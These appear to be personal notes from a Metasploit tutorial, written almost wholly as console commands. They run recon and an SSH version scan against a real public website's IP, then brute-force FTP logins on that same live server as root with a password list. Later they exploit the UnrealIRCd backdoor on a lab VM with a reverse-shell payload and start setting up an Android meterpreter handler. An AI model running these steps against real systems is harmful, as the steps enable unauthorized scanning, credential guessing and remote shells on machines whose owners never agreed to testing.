{Basic Overview}

service postgresql start
msfconsole

clear

show exploits
search mysql
info auxiliary/scanner/mysql/mysql_login ---Mysql instance
use auxiliary/scanner/mysql/mysql_login --- to use this tool
back  -------- get back to msf
...........................................................................................................

{Using Tools and Exploits}

whois thenewboston.com --------- for basic info of the website
host thenewboston.com ---------- IP address of the web server
nmap -F 45.55.248.208 ---------- to know the services of the host
search ssh_version ------------- for SSH versions
info auxiliary/scanner/ssh/ssh_version ------ For details of the ssh versions
use auxiliary/scanner/ssh/ssh_version ------- To use ssh_version tool
show options ------ To show options
set RHOSTS 45.55.248.208 --------- To set the target address
set THREADS 5 ------- to set 5 threads
run --------------- To run attack
............................................................................................................

{FTP LOGIN}

search ftp_login
info auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_login
show options
set RHOSTS 45.55.248.208
set THREADS 30
set USERNAME root
set PASS_FILE Desktop/top_100.txt
show options
exploit
Ctr+C ---- to stop the attack
back
................................................................................................................
{Setting Up Metasploit}

Open Virtual Machine
login: msfadmin
pass:  msfadmin
VM IP: 192.168.75.128
Kali : 10.0.2.15
nmap -F 192.168.75.128
...................................................................................................................
{Payloads and Backdoors}
service postgresql start
msfconsole
search unreal 3.2.1.8
info exploit/unix/irc/unreal_ircd_3281_backdoor
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set RHOST 192.168.75.128
show payloads
set payload cmd/unix/reverse
show options
set LHOST 10.0.2.15
show options
exploit
..................................................................................................................
use multi/handler
use android/meterpreter/reverse_tcp
set LHOST 
